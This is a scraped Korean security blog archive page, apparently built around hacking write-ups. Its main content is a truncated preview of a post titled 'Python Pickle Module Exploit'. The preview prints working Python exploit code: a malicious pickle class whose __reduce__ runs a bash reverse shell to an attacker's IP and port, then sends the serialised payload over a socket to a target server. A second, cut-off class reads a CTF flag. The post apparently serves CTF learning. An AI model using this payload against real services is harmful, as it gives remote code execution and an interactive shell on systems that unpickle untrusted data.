Notice
Recent Posts
Recent Comments
Link
Tags
- UnCrackable level 1
- PortSwigger
- MariaDB
- File Upload
- CVE-2022-22965
- XALZ 압축해제
- HacktheBox Mobile
- Hackthebox cat
- JSP
- nginx
- SeeTheSharpFlag
- Xamarin 분석
- CVE-2010-1622
- UnCrackable
- HackTheBox APKey
- xss
- NoSQL
- Directory traversal
- CVE-2014-0094
- DOM
- mongoDB
- login form
- blind sql injection
- HackTheBox
- Android Backup
- Android 6.0
- getCachedIntrospectionResults
- mstg
- Frida
- JAVA ClassLoader 취약점
Archives
- Today
- Total
목록CVE-2011-2520 (1)
끄적끄적
[vulnerability] Python Pickle Module Exploit
#RCE class Shell_code(object): def __reduce__(self): return (os.system,('/bin/bash -i >& /dev/tcp/"Client IP"/"Listening PORT" 0>&1',)) shell = cPickle.dumps(Shell_code()) client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) client_socket.connect(('Server IP','Server PORT')) client_socket.send(shell) #CTF Flag Read(Web Server) class Read_Flag(object): def __reduce__(self): return (e..
Security/Web
2021. 10. 7. 10:31